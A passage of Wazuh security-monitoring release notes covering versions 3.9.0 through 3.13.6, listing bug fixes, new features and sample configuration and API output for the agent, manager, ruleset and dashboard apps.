3.13.6 Release notes - 19 September 2022

This section lists the changes in version 3.13.6. More details about these changes are provided in each component changelog:

Wazuh core
  • #14823 A path traversal flaw in Active Response affecting agents from v3.6.1 is fixed.

Wazuh Kibana app
  • Support for Wazuh v3.13.6.

Wazuh Splunk
  • Support for Wazuh v3.13.6.

3.13.5 Release notes - 24 August 2022

This section lists the changes in version 3.13.5. More details about these changes are provided in each component changelog:

Wazuh Kibana app
  • #4336 Sanitize the report's inputs and usernames.

Wazuh Splunk
  • Support for Wazuh v3.13.5.

3.13.4 Release notes - 30 May 2022

This section lists the changes in version 3.13.4. More details about these changes are provided in each component changelog:

Wazuh core
  • A crash in Vulnerability Detector when scanning agents running on Windows is now fixed (backport from 4.3.2).

Wazuh Kibana app
  • Support for Wazuh v3.13.4.

Wazuh Splunk
  • Support for Wazuh v3.13.4.

3.13.3 Release notes - 28 April 2021

This section lists the changes in version 3.13.3. More details about these changes are provided in each component changelog:

Wazuh core
  • An issue in Vulnerability Detector that made modulesd crash while updating the NVD feed due to a missing CPE entry is now fixed.

Wazuh Kibana app
  • Support for Wazuh v3.13.3.

Wazuh Splunk
  • Support for Wazuh v3.13.3.

3.13.2 Release notes - 22 September 2020

This section lists the changes in version 3.13.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Updated the default NVD feed URL from 1.0 to 1.1 in Vulnerability Detector.

Wazuh Kibana app
  • Support for Wazuh v3.13.2.

Wazuh Splunk
  • Support for Wazuh v3.13.2.

3.13.1 Release notes - 15 July 2020

This section lists the changes in version 3.13.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Added the settings <max_retries> and <retry_interval> to adjust the number of connection retries and the agent failover interval (see the sketch after this list).

  • Fixed Modulesd crash caused by Vulnerability Detector when OS inventory is disabled for the agent.
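
A minimal sketch of these settings in the agent configuration, assuming they sit in the <client> section next to the <server> block; the values are only illustrative:

    <client>
      <server>
        <address>MANAGER_IP</address>
      </server>
      <!-- Number of connection attempts and the wait, in seconds, between them -->
      <max_retries>5</max_retries>
      <retry_interval>10</retry_interval>
    </client>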

Wazuh Kibana app
  • Support for Wazuh v3.13.1.

Wazuh API
  • A new validator was added to the /sca/:agent_id/checks/:policy_id endpoint that allows filtering the SCA checks by reason, status, and command.

Wazuh Splunk
  • Support for Wazuh v3.13.1.

  • Support for Splunk v8.0.4.

  • Updated references of the field vulnerability.reference to vulnerability.references.

  • Fixed wazuh-monitoring indices on Splunk 8.0+ version.

3.13.0 Release notes - 22 June 2020

This section lists the changes in version 3.13.0. More details about these changes are provided in each component changelog:

Wazuh core

Added

  • Included the NVD as a feed for Linux agents in vulnerability detector.

  • Improved the vulnerability detector engine to correlate alerts between different feeds.

  • Added vulnerability detector module unit testing for Unix source code.

  • Added a timeout to the updates of the vulnerability detector's feeds to prevent hangings.

  • Added option for the JSON decoder to choose the treatment of array structures.

  • Added mode value (real-time, Who-data, or scheduled) as a dynamic field in FIM alerts.

  • Added a field to configure the maximum number of files to be monitored by the FIM module (see the sketch after this list).

  • New module to pull and process logs from Google Cloud Pub/Sub service.

  • Added support for mapping rules with MITRE ATT&CK framework.

  • Added Microsoft's Software Update Catalog, used by the vulnerability detector, as a dependency.

  • Added support for aarch64 and armhf architectures.
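
A hedged sketch of the new setting, assuming the <file_limit> block inside <syscheck>; the entry count is only illustrative:

    <syscheck>
      <!-- Cap the number of files tracked in the FIM database -->
      <file_limit>
        <enabled>yes</enabled>
        <entries>100000</entries>
      </file_limit>
    </syscheck>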

Changed

  • Decreased the event fetching delay from 10 milliseconds to 5 milliseconds in the FIM real-time and whodata modes (rt_delay).

  • Who-data includes new fields: process CWD, parent process id, and CWD of parent process.

  • FIM now allows renaming/deleting files while calculating their hash.

  • Extended the static fields comparison in the ruleset options.

  • The state field has been removed from vulnerability alerts.

  • The NVD is now the primary feed for the vulnerability detector in Linux.

  • Removed OpenSCAP policies installation and configuration block.

  • Changed same/different_systemname for same/different_system_name in Analysisd static filters.

  • Updated the internal Python interpreter from v3.7.2 to v3.8.2.

Other fixes and improvements

  • Fixed a bug that occasionally kept memory reserved when deleting monitored directories in FIM.

  • Fixed an issue regarding inotify watcher allocation when modifying directories in FIM real-time mode.

  • Fixed an error that caused the alerts deletion with a wrong path in Who-data mode.

  • Fixed an issue that did not generate alerts in Who-data mode when a subdirectory was added to the monitored directory in Windows.

  • Avoided the truncation of the full log field of the alert when the path is too long.

  • When there is a failure setting policies in Windows, FIM will automatically change from Who-data to real-time mode.

  • Fixed an error that prevented restarting Windows agents from the manager.

  • Fixed an error that did not allow using the URL tag when configuring the NVD in the vulnerability detector module.

  • Fixed TOCTOU condition in Clusterd when merging agent-info files.

  • Fixed race condition in Analysisd when handling accumulated events.

  • Avoided counting links when generating alerts for ignored directories in Rootcheck.

  • Fixed typo in the path used for logging when disabling an account.

  • Fixed an error when receiving different Syslog events in the same TCP packet.

  • Fixed a bug in vulnerability detector on Modulesd when comparing Windows software versions.

  • Fixed a bug that caused an agent's disconnection time not to be displayed correctly.

  • Optimized the function to obtain the default gateway.

  • Fixed host verification when signing a certificate for the manager.

  • Fixed a possible duplicated ID in client.keys when adding a new agent through the API with a specific ID.

  • Avoided duplicate descriptors when using wildcards in the localfile configuration.

  • Guaranteed that all processes are killed when service stops.

  • Fixed mismatch in integration scripts when the debug flag is set to active.

Wazuh Kibana App

Added

  • Support for Wazuh v3.13.0.

  • Support for Kibana v7.7.1

  • Support for Open Distro 1.8

  • Added new navigation experience with a global menu.

  • Added a breadcrumb in Kibana top nav.

  • Added a new Agents Summary Screen.

  • Added a new feature to add sample data to dashboards.

  • Added MITRE integration.

  • Added Google Cloud Platform integration.

  • Added TSC integration.

  • Added a new integrity monitoring state view for agent.

  • Added a new integrity monitoring files detail view.

  • Added a new component to explore compliance requirements.

Changed

  • Code migration to React.js.

  • Global review of styles.

  • Unified Overview and Agent dashboards into new Modules.

  • Changed vulnerabilities' dashboard visualizations.

Fixed

  • Fixed Open Distro tenants to be functional.

  • Improved navigation performance.

  • Avoid creating the wazuh-monitoring index pattern if it is disabled.

  • SCA checks without compliance field could not be expanded.

Wazuh API

Added

  • Added new API requests:
    • GET /mitre

    • GET /rules/mitre

    • GET /rules/tsc

  • Added new filters to the GET /rules request:
    • mitre: Filters the rules by MITRE requirement.

    • tsc: Filters the rules by TSC requirement.

Changed

  • Increased the maximum allowed size of the files to be uploaded from 1MB to 10MB. This change applies to:

    • POST /manager/files

    • POST /cluster/:node_id/files

    • POST /agents/groups/:group_id/configuration

    • POST /agents/groups/:group_id/files/:file_name

Wazuh ruleset

Added

  • Added rules and decoders for macOS sshd logs.

  • Added TSC/SOC compliance mapping.

  • Added rules and decoders for PaloAlto logs.

  • Added rules and decoder to monitor the FIM database status.

  • Added rules for WAF.

Changed

  • Changed description of vulnerability detector rules.

  • Changed squid decoders.

Fixed

  • Fixed the provider name so that Windows Eventlog's logs match with the Wazuh rules.

  • Fixed static filters related to the system_name field.

  • Removed trailing whitespaces in the group name section of the ruleset.

  • Removed invalid zeroes from rule IDs.

Wazuh Splunk
  • Support for Wazuh v3.13.0

3.12.3 Release notes - 30 April 2020

This section lists the changes in version 3.12.3. More details about these changes are provided in each component changelog:

Wazuh core
  • Disabled WAL in databases handled by Wazuh DB to save disk space.

  • Fixed a bug in Remoted that could prevent agents from connecting in UDP mode.

  • Fixed a bug in the shared library that caused daemons to be unable to find the ossec group.

  • Prevented Syscollector from falling into an infinite loop when it failed to collect the Windows hotfixes.

  • Fixed a memory leak in the system scan by Rootcheck on Windows.

  • Fixed a bug in Logcollector that caused the out_format option not to apply to the targeted agent.

  • Fixed a bug that prevented FIM from handling large inode numbers correctly.

  • Fixed a bug that made ossec-dbd crash due to a bad mutex initialization.

Wazuh Kibana App
  • Support for Wazuh v3.12.3

Wazuh Splunk
  • Support for Wazuh v3.12.3

3.12.2 Release notes - 9 April 2020

This section lists the changes in version 3.12.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed a bug in Vulnerability Detector that made wazuh-modulesd crash when parsing the version of a package from a RHEL feed.

Wazuh Kibana App
  • Support Wazuh 3.12.2.

Wazuh Splunk
  • Support for Wazuh v3.12.2

3.12.1 Release notes - 8 April 2020

This section lists the changes in version 3.12.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Updated MSU catalog on 31/03/2020.

  • Fixed XML validation with paths ending in \.

  • Fixed compatibility with the Vulnerability Detector feeds for Ubuntu from Canonical, that are available in a compressed format.

  • Added missing field database to the FIM on-demand configuration report.

  • Fixed a bug in Logcollector that made it forward a log to an external socket infinite times.

  • Fixed a buffer overflow when receiving large messages from Syslog over TCP connections.

  • Fixed a malfunction in the Integrator module when analyzing events without a certain field.

  • Removed support for Ubuntu 12.04 (Precise) in Vulnerability Detector as its feed is no longer available.

Wazuh Kibana App
  • Support Wazuh 3.12.1

  • Added new FIM settings on configuration on demand.

  • Updated agent's variable names in deployment guides.

  • Pagination is now displayed as tables.

Wazuh ruleset
  • Fixed the Dropbear brute force rule entrypoint.

Wazuh Splunk
  • Support for Wazuh v3.12.1.

  • Added new FIM settings on configuration on demand.

3.12.0 Release notes - 24 March 2020

This section lists the changes in version 3.12.0. More details about these changes are provided in each component changelog:

Wazuh core

File integrity monitoring

  • Added synchronization capabilities for FIM (see the sketch after this list).

  • Added SQL database for the FIM module. Its storage can be switched between disk and memory.

  • Added FIM module unit testing for Unix source code.

  • Added FIM module unit testing for Windows source code.

  • Moved the FIM logic engine to the agent.
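
A minimal sketch of the synchronization settings, assuming the <synchronization> block inside <syscheck>; the interval is only illustrative:

    <syscheck>
      <!-- Periodically re-synchronize the agent FIM database with the manager -->
      <synchronization>
        <enabled>yes</enabled>
        <interval>5m</interval>
      </synchronization>
    </syscheck>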

Logcollector

  • Avoided reopening the current socket when Logcollector fails to send an event.

  • Prevented Logcollector from starving when it has to reload files.

  • Made Logcollector continuously attempt to reconnect with the agent daemon.

AWS

  • Added support for monitoring Cisco Umbrella S3 buckets.

  • Added support for monitoring AWS S3 buckets in GovCloud regions.

Other fixes and improvements

  • Added multi-target support for unit testing

  • Added a status validation when starting Wazuh.

  • Added automatic reconnection with the Eventchannel service when it is restarted.

  • Made Windows agents send the keep-alive independently.

  • Source IP address checking by default in the registration process is no longer enforced.

  • Fixed a small memory leak in clusterd.

  • Fixed a crash in the fluent forwarder when SSL is not enabled.

  • Replaced non-reentrant functions to avoid race condition hazards.

  • Fixed the registration of more than one agent as any when forcing to use the source IP address.

  • Fixed Windows upgrades in custom directories.

  • Fixed the format of the alert payload passed to the Slack integration.

Wazuh Kibana App
  • Support for Wazuh v3.12.0

  • Added a new setting to hide manager alerts from dashboards.

  • Added a new setting to be able to change API from the top menu.

  • Added a new setting to enable/disable the known fields health check.

  • Added support for PCI 11.2.1 and 11.2.3 rules.

  • Restructured the optimize/wazuh directory.

  • Improved the performance of dashboard report generation.

  • Discover time range selector is now displayed on the Cluster section.

  • Added the win_auth_failure rule group to Authentication failure metrics.

  • Negative values in Syscheck attributes now have their correct value in reports.

Wazuh API
  • Enabled HTTPS by default in installation script.

  • Added distinct parameter to syscheck endpoints.

  • Added condition field to SCA endpoints.

  • Fixed a bug that made requests not being distributed to the selected node_id.

Wazuh ruleset
  • Extended the rules to detect shellshock attacks.

  • Updated Roundcube decoder to support versions greater than 1.4.

  • Added rules and decoders for Junos.

  • Fixed GPG requirement in Windows rules.

  • Improved Cisco decoders and fixed Owlh rule's IDs conflict.

  • Fixed checkpoint decoders to read events with a different format.

3.11.4 Release notes - 25 February 2020

This section lists the changes in version 3.11.4. More details about these changes are provided in each component changelog:

Wazuh core

Agent

  • Fixed a bug on Agentd that prevented agents from resolving host names after initialization.

3.11.3 Release notes - 28 January 2020

This section lists the changes in version 3.11.3. More details about these changes are provided in each component changelog:

Wazuh core

Agent

  • Fixed a bug in Rootcheck on Windows that caused false positives about file size mismatch.

3.11.2 Release notes - 22 January 2020

This section lists the changes in version 3.11.2. More details about these changes are provided in each component changelog:

Wazuh core

Security Configuration Assessment

  • Fixed handler leaks on SCA module for Windows agents.

Vulnerability Detector

  • The module needed around 1 GB of memory during the NVD feed fetch. Memory usage now remains at a few hundred MBs.

Rootcheck

  • Fixed bug on Rootcheck scan that led to 100% CPU usage spikes. The <readall> option was wrongly applied, even when disabled.

  • Fixed handler leaks on Rootcheck module for Windows agents.

Other fixes and improvements

  • Fixed a memory leak in Clusterd: RAM usage climbed steadily over several days until memory was exhausted.

  • Fixed incorrect VERSION file permissions caused by the ruleset update.

  • The Slack integration now correctly handles alerts with no description.

Wazuh UI for Kibana
  • Increased list filesize limit for the CDB-list.

  • The XML validator now correctly handles the -- string within comments.

3.11.1 Release notes - 10 January 2020

This section lists the changes in version 3.11.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed a bug in the manager that made Analysisd max out the CPU usage when decoding logs from Windows Eventchannel.

3.11.0 Release notes - 23 December 2019

This section shows the most relevant improvements and fixes in version 3.11.0. More details about these changes are provided in each component changelog:

Wazuh core

Vulnerability detector

  • Windows support. Thanks to a combination of NVD feed and the Microsoft Security guide, the module is able to detect system vulnerabilities and software vulnerabilities.

  • Added support for Debian 10 and RHEL 8.

  • Vulnerability detector alerts include PCI-DSS mapping.

Inventory

  • Added extraction for Windows Security Updates (hotfixes).

  • Processes and ports are now supported in macOS.

Log collection

  • Allowed JSON escaping for logs in the output format.

  • Added the host's primary IP address in the output format.

  • Wildcards don't detect directories as log files any more.

Analysis engine

  • Frequency based rules aggregate the counter for the same event source by default. Introduced a new setting to toggle this behavior: global_frequency.

  • Fields protocol, system_name, data and extra_data can now be used for event matching in rules creation.

  • The ossec-makelist binary has been deprecated. The Analysisd daemon will compile the CDB lists on the startup.

Other fixes and improvements

  • The Wazuh agent now waits until the network service is ready before starting.

  • The agent key request service now displays a warning message when registering to an unverified manager.

  • Improved <address> field validation at agent start up.

  • Windows EventChannel alerts now include the full message with the coded field translation.

Wazuh API
  • The query parameter (q) now can be used for filtering rules, decoders and logs.

  • New endpoint: PUT /agents/group/{group_id}/restart for restarting all agents assigned to a group.

  • New endpoint: GET /syscollector/:agent_id/hotfixes for listing the system hotfixes (Windows).

  • Improved error descriptions for the PUT /agents/:agent_id/upgrade_custom API call.

Wazuh Ruleset
  • New decoders and rules for McAfee ePolicy Orchestrator.

  • Added rules to collect events related to the Windows firewall.

  • OSQuery logs related to internal messages appear in alerts.

Wazuh WUI for Kibana
  • Support for Kibana: v6.8.6, v7.5.1.

  • Support for OpenDistro: v1.3.0.

  • The API credentials configuration has been migrated from the .wazuh index to the wazuh.yml configuration file. The hosts API configuration is now managed from this configuration file instead of from the WUI.

  • Reporting module events are now logged in the Wazuh WUI logs.

  • The index pattern selector is now hidden when only one index exists.

  • Fixed CSV export for files in an agents group.

Wazuh WUI for Splunk
  • CDB lists names are now correctly displayed.

  • Fixed a bug in Syscheck section when generating the PDF configuration summary.

Other additions and improvements

  • The new log collection option <reconnect_time> is included in the Log collection configuration section (see the sketch after this list).

  • Rules/Decoders/CDB-lists files can be uploaded using a Drag & Drop feature.

  • Extended the "Add new agent" guide.

  • Opening an empty file is now correctly handled and doesn't lead to an unexpected error.
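
A hedged sketch of the <reconnect_time> option for a Windows Eventchannel localfile, as it appears in the log collection configuration; the channel and interval are only illustrative:

    <localfile>
      <location>Security</location>
      <log_format>eventchannel</log_format>
      <!-- Retry the Eventchannel subscription every 5 seconds if the service restarts -->
      <reconnect_time>5s</reconnect_time>
    </localfile>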

3.10.2 Release notes - 23 September 2019

This section lists the changes in version 3.10.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed error in log collection module when reloading localfiles with strftime wildcards.

3.10.1 Release notes - 19 September 2019

This section lists the changes in version 3.10.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed an error in Remoted when reloading agent keys (locked mutex disposal).

  • Fixed an invalid read error in Remoted counters.

Wazuh API
  • Fixed error after removing a high volume of agents from a group using the Wazuh API.

3.10.0 Release notes - 18 September 2019

This section shows the most relevant improvements and fixes in version 3.10.0. More details about these changes are provided in each component changelog:

Wazuh core

Security Configuration Assessment

  • Improved internal logic engine and policy syntax changes. Available SCA policies have been also adapted to this refactor.

  • A numerical comparator has been included as part of the rules syntax.

  • Compliance mapping information is now part of the alert groups.

  • Policies present at the default folder are now automatically loaded.

  • The Manager will request the last assessment results when the DB is empty between scans.

For further information, check our SCA documentation.

HIPAA/NIST support

  • HIPAA and NIST 800 53 groups were added to the compliance groups parser.

  • New corresponding fields in the Wazuh Elastic Stack template.

Thanks to these additions, the app includes new HIPAA and NIST 800 53 compliance dashboards.

File integrity monitoring

  • FIM now identifies equivalent paths adding them only once.

  • An error in Windows who-data when handling the directories list has been fixed.

  • Who-data Linux alerts with hexadecimal fields are now correctly handled.

AWS module

  • Fixed the exception handling when using an invalid bucket.

  • Fixed an error when getting profiles in custom AWS buckets.

  • Fixed the error message when an AWS bucket is empty.

IPv6 Compatibility

  • Increased the IP address internal representation size to support IPv6.

  • IPv6 loopback address has been added to localhosts list in the DB output module.

Other fixes and improvements

  • The log collection module now extends the duplicate file detection with inode comparison, useful for symbolic and hard links.

  • Agentless queries now accept ] and > characters as terminal prompt characters.

  • The mail module now supports alerts with the full_log field when using alerts.json as alerts source.

  • On overwriting rules, list field is now correctly copied from the original to the overwriting rule.

  • Fixed an error in the hardware inventory collector for PowerPC architectures.

Wazuh API
  • A new API request has been created to get the full summary of agents:

    GET /summary/agents

    {
        "error": 0,
        "data": {
            ...
            "agent_status": {
                "Total": 6,
                "Active": 6,
                "Disconnected": 0,
                "Never connected": 0,
                "Pending": 0
            },
            "agent_version": {
                "items": [
                    {
                        "version": "Wazuh v3.10.0",
                        "count": 1
                    },
                    {
                        "version": "Wazuh v3.9.5",
                        "count": 5
                    }
                ],
                "totalItems": 6
            },
            "last_registered_agent": {
                "os": {
                    "arch": "x86_64",
                    "codename": "Bionic Beaver",
                    "major": "18",
                    "minor": "04",
                    "name": "Ubuntu",
                    "platform": "ubuntu",
                    "uname": "Linux |ee7d4f51c0ae |4.18.0-16-generic |#17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 |x86_64",
                    "version": "18.04.2 LTS"
                },
                ...
            }
        }
    }
    
  • Support for HIPAA, NIST 800 53 and GPG13 compliance: adding new API requests and filters.

  • Improved stored password security: hashing changed from MD5 to BCrypt.

  • Fixed API installation in Docker CentOS 7 containers.

Wazuh Ruleset

981 rules have been mapped to support HIPAA and NIST 800 53 compliance. In addition, the SCA policies have been fully reviewed, adapted to the module refactor, and extended with support for new platforms.

Rules and decoders have also been added for other technologies:

  • Rules for the VIPRE antivirus.

  • Support for Cisco-ASA devices with new rules and decoders.

  • Added Windows Software Restriction Policy rules.

  • Added Perdition (IMAP/POP3 proxy) rules.

  • Added support for NAXSI web application firewall.

Wazuh Kibana App
  • HIPAA and NIST 800 53 new dashboards for the recently added regulatory compliance mapping.

  • Added support for custom Kibana spaces.

  • Wazuh Kibana app now works as a native plugin and can be safely hidden/displayed depending on the selected space.

  • New alerts summary in Overview > FIM panel.

  • Alerts search bar fixed for Kibana v7.3.0, now queries are applied as expected.

  • Hide attributes field from non-Windows agents in the FIM table.

  • Fixed broken view in Management > Configuration > Amazon S3 > Buckets.

  • Restored Remove column feature in Discover tabs.

  • The app installation date is now correctly updated.

Wazuh Splunk App
  • HIPAA and NIST 800 53 new dashboards for the recently added regulatory compliance mapping.

  • New design and several UI/UX changes.

  • Wazuh Splunk app has been adapted for Microsoft Edge Browser.

  • Debug level added for app logs.

  • Modules are being shown only when supported by the agent OS.

  • API sensitive information is now hidden on every transition.

  • Non-active Agent data is now being shown correctly.

Other additions and improvements for both Apps

  • Export all the information of a Wazuh group and its related agents in a PDF document.

  • Export the configuration of a certain agent as a PDF document.

  • Added an interactive and user-friendly guide for agents registering, ending in a copy & paste snippet.

3.9.5 Release notes - 8 August 2019

This section shows the most relevant improvements and fixes in version 3.9.5. More details about these changes are provided in each component changelog:

Wazuh manager
  • Fixed a bug in the Framework that prevented Cluster and API from handling the file client.keys if it's mounted as a volume on Docker.

  • Fixed a bug in Analysisd that printed the millisecond part of the alerts' timestamp without zero-padding. That prevented Elasticsearch 7 from indexing those alerts.

Wazuh Kibana app
  • Fixed a bug present in Kibana v7.3.0, affecting Firefox browser, which creates an endless loop if two or more query filters are added.

3.9.4 Release notes - 7 August 2019

This section shows the most relevant improvements and fixes in version 3.9.4. More details about these changes are provided in each component changelog:

Wazuh agent
  • Fixed a bug in FIM that made it apply a wrong configuration. This occurred when defining different options for nested directories.

  • Fixed a bug in Logcollector that made it apply a wrong configuration. This happened when defining multiple stanzas for the same file with different options.

  • Fixed a bug in the agent that could make it truncate its IP address within the control message.

  • Fixed a bug in the Windows agent that produced a resource leak when monitoring directories in who-data mode.

Wazuh manager
  • Fixed a bug in Analysisd that could potentially make it crash while handling JSON objects due to a race condition.

  • Fixed a bug in Wazuh DB that could make it crash when closing database files due to a double free.

  • Fixed a bug in Remoted that made it send data to an agent that has just disconnected in TCP mode.

  • Prevent SCA from producing inconsistencies in the database on the manager side when policy IDs are duplicated.

  • Fixed a race condition hazard between Clusterd and Remoted while synchronizing agent-related files.

  • Wazuh DB did not remove a database file until it was committed. Now, the database will be closed immediately.

Wazuh Apps
  • Allowed filtering by clicking a column in rules/decoders tables.

  • Allowed open file in rules table clicking on the file column.

  • Improved Kibana app performance.

  • Removed path filter from custom rules and decoders.

  • Now path column in rules and decoders is shown.

  • Removed SCA overview dashboard.

  • Disabled last custom column removal.

  • Agents messages across sections have been unified.

  • Fixed check stored APIs.

  • Improved wz-table performance.

  • Fixed inconsistent data between visualizations and tables in Overview Security Events.

  • Timezone applied in cluster status.

  • Fixed Overview Security Events report when wazuh.monitoring is disabled.

  • Now duplicated visualization toast errors are handled.

  • Fixed not properly updated breadcrumb in ruleset section.

  • Implicit filters can't be destroyed now.

  • Fixed the Windows agent dashboard that didn't show failed logon access.

  • Scrollbars in file viewers have been fixed on Firefox.

  • Fixed agent search filters lost when refreshing.

  • Number of agents is now properly updated.

  • Alerts of level 12 are now displayed on the Security Events table.

3.9.3 Release notes - 9 July 2019

This section shows the most relevant improvements and fixes in version 3.9.3. More details about these changes are provided in each component changelog:

Wazuh core
  • Log collector will no longer report bookmarked Windows Eventchannel events by default.

  • Agent-info files that are not generated in UTF-8 format will be discarded.

  • Fixed a memory leak in the Modules daemon when its on-demand configuration was requested.

  • Fixed a bug that crashed Analysisd and Logtest when trying rules having <different_geoip> and no <not_same_field> stanza.

  • Fixed the parser of Canonical's OVAL feed after a syntax change in the feed.

  • Fixed rules with <list lookup="address_match_key" /> producing a false match when the CDB list file was missing.

  • Remote configuration was missing the <ignore> stanzas for Syscheck and Rootcheck when defined as sregex.

Wazuh apps
  • Added support for Kibana v7.2.0.

  • Added support for Kibana v6.8.1.

  • Fixed the height of the menu directive when using dynamic height.

  • Fixed timepicker in cluster monitoring.

  • Fixed time offset for reporting table.

  • Fixed API call for fetching GDPR requirements in agents.

  • Fixed filters that were not being applied when refreshing the agents search bar.

  • Fixed wrong fields in never connected agents.

  • Fixed the error message when the App detects an unexpected Wazuh version.

  • Fixed invalid date message in some web browsers.

  • Fixed missing ignored and ignored_sregex fields in the on-demand configuration.

Wazuh ruleset
  • Changed NGINX decoder to make the field "server" optional. (Credits to @iasdeoupxe).

  • Removed an unwanted trailing single quote in the Audit decoder. (Credits to @branchnetconsulting).

  • Avoid conflicts between the "uid" and "auid" fields in the Audit decoder. (Credits to @tokibi).

  • Exclude the full log field from rules for AWS, Suricata, VirusTotal, OwnCloud, Vuls, CIS-CAT, Vulnerability Detector, MySQL, Osquery and Azure.

3.9.2 Release notes - 10 June 2019

This section shows the most relevant improvements and fixes in version 3.9.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed configuration request for whitelists when the block was empty.

  • Fixed error deleting temporary files during cluster synchronization.

  • Fixed wrong permissions on agent group files when they are synchronized by the cluster.

  • Fixed memory errors in the CIS-CAT module.

  • Fixed error checking agent version in remote upgrades.

  • Fixed a race condition in the analysis daemon when decoding SCA events, using reentrant functions to maintain context between successive calls.

  • Fixed a file descriptor leak in modulesd. This bug appeared when the timeout was exceeded when executing a command.

  • Fixed handling of invalid content in the Red Hat feed, which caused an unexpected exit of the Wazuh modules daemon.

  • Prevent the agent from stopping if it fails to resolve the manager hostname on startup.

Wazuh apps
  • Fixed visualization in agent overview dashboard.

  • Fixed adding API data in an invalid format.

  • Adapted requests executed in Dev Tools to the API standards.

  • The Security Events dashboard now shows the same metrics as the agents overview.

  • Fixed SCA policy checks table.

  • Added missing dependency for Discover.

Wazuh ruleset
  • Fixed Windows rule about audit log.

  • Fixed invalid check of the Solaris 11 SCA policy.

3.9.1 Release notes - 21 May 2019

This section shows the most relevant improvements and fixes in version 3.9.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Logcollector: Improved wildcard support for Windows platforms. Now, it is possible to set multiple wildcards per path, as shown below:

    <localfile>
        <location>C:\Users\user\Desktop\*test*</location>
        <log_format>syslog</log_format>
        <exclude>C:\Users\user\Desktop\*test*.json</exclude>
    </localfile>
    
  • Fixed a crash when an active response command was received and the module was disabled.

  • Fixed crash when collecting large files on Windows.

  • Fixed Wazuh manager automatic restart via API on Docker containers.

  • Fixed corruption error in cluster agent info files synchronization.

  • Reverted five seconds reading timeout in FIM scans.

Wazuh apps
  • Added support for Elastic Stack v7.1.0

  • Added support for Elastic Stack v6.8.0

  • Improved dynamic height for the configuration editor in the Splunk app.

  • Fixed infinite API log fetching, and fixed error messages from the rule editor that were handled but not shown in the Splunk app.

Wazuh ruleset
  • macOS SCA policies based on CIS benchmarks have been corrected.

  • Windows rules for EventLog and Security Essentials have been fixed, and the field filters are now more restrictive to avoid false positives.

  • Fixed typo in Windows NT registries within Windows SCA policies.

Elastic Stack 7

Wazuh is now compatible with Elastic Stack 7, which includes, among others, new out-of-the-box security features.

Additionally, as of this Wazuh release, Logstash is no longer required: Filebeat sends the events directly to the Elasticsearch server.

Elastic Stack 6.x is still supported by Wazuh.

3.9.0 Release notes - 2 May 2019

This section shows the most relevant improvements and fixes in version 3.9.0. More details about these changes are provided in each component changelog:

Wazuh core

Automated deployment

Agent installers now support variables that allow deploying an agent in a single step.

Here we can see an example for CentOS/RHEL:

$ WAZUH_MANAGER_IP="10.0.0.2" yum install wazuh-agent

The above example will install, configure and register the agent, simplifying the deployment process.

Security Configuration Assessment (SCA)

Security Configuration Assessment (SCA) is a new module created to improve the hardening and policy monitoring capabilities of Wazuh. Policy files are now in YAML format, making them easier to read and modify. Policies have been extended, and useful compliance information has been added to each policy (rationale, remediation, CSC, etc.). Scan results are sent to and stored on the manager side, and are accessible through both the Wazuh API and the Wazuh app.

SCA includes a new database integrity algorithm (which will be included in other modules such as FIM and Inventory in coming releases). The agent only sends those checks whose status has changed since previous scans, saving network traffic and decreasing manager load.

Here is an example that runs a scan on the 15th of every month:

<sca>
    <enabled>yes</enabled>
    <scan_day>15</scan_day>
    <policies>
        <policy>cis_debian_linux_rcl.yml</policy>
    </policies>
</sca>

Inventory module

  • Get network interface and open port information for Windows XP and Windows Server 2003 systems.

  • Events information can be decoded into dynamic fields, so we can define rules based on Inventory events. Decoders now accept syscollector as value for <decoded_as> tags.

  • Get the real MAC address of each interface from its address file under /sys/class/net instead of getting it from interfaces with AF_PACKET sockets, thus avoiding problems with bonded interfaces that share the same MAC address at the software level.

FIM: Who-data

  • Who-data now supports a pre-start health check to make sure Audit socket is ready.

  • Who-data now supports symbolic links hot changes.

  • Added support for Fedora 29 systems that use Audit 3.0.

AWS Organizations in CloudTrail

With this enhancement, it is possible to get logs for the created organizations by adding <aws_organization_id>ORGANIZATION</aws_organization_id> to the module configuration.

Here is an example of how to configure this new AWS capability:

<wodle name="aws-s3">
    <disabled>no</disabled>
    <bucket type="cloudtrail">
        <name>cloudtrail</name>
        <aws_organization_id>wazuh</aws_organization_id>
        <aws_profile>default</aws_profile>
    </bucket>
    <remove_from_bucket>no</remove_from_bucket>
    <interval>20m</interval>
    <run_on_start>yes</run_on_start>
    <skip_on_error>no</skip_on_error>
</wodle>

Wazuh cluster

  • The Wazuh manager no longer has any external dependencies on Python. The manager now includes its own embedded Python 3 interpreter, making it easier to configure integrations such as AWS, VirusTotal, Azure or Slack.

  • Cluster synchronization is now up to 100x faster, thanks to the asyncio library (Asynchronous I/O), which improves multi-threading performance and network communication.

Added -t and -c options to the Wazuh cluster daemon. These options allow the user to test either an alternative configuration file or the existing one.
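
A minimal sketch of how these options could be combined, assuming the daemon binary lives under the default /var/ossec/bin path (the paths and the test file name are illustrative assumptions):

/var/ossec/bin/wazuh-clusterd -t
/var/ossec/bin/wazuh-clusterd -t -c /var/ossec/etc/ossec-test.conf

The first command tests the configuration currently in use, while the second one tests an alternative configuration file before applying it.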

Other fixes and improvements

  • Fixed an error in the osquery configuration validation: the osqueryd daemon started regardless of the string it received, whether it was yes, no or anything else.

  • Wazuh manager starts regardless of the contents of local_decoder.xml.

  • Prevented Integrator, Syslog Client and Mail forwarder from getting stuck while reading alerts.json.

  • The Vulnerability Detector module now checks that the severity of the alerts has been unified, and also checks whether the database is empty before starting a new scan.

  • Labels starting with _ are now reserved for internal use only.

  • The Windows installer now loads the corresponding configuration file based on the system version.

  • Increased the Remoted daemon performance by up to 80x for TCP connections.

Wazuh API
  • Manager configuration file is now editable.

  • Creation, editing and removal of rules, decoders and CDB lists are now supported.

  • Restart of multiple nodes is now supported.

  • SCA endpoints for policies, scan and checks.

GET /sca/001
{
    "error": 0,
    "data": {
        "totalItems": 3,
        "items": [
            {
                "pass": 2,
                "references": "https://www.ssh.com/ssh/",
                "invalid": 0,
                "description": "Guidance for establishing a secure configuration for SSH service vulnerabilities.",
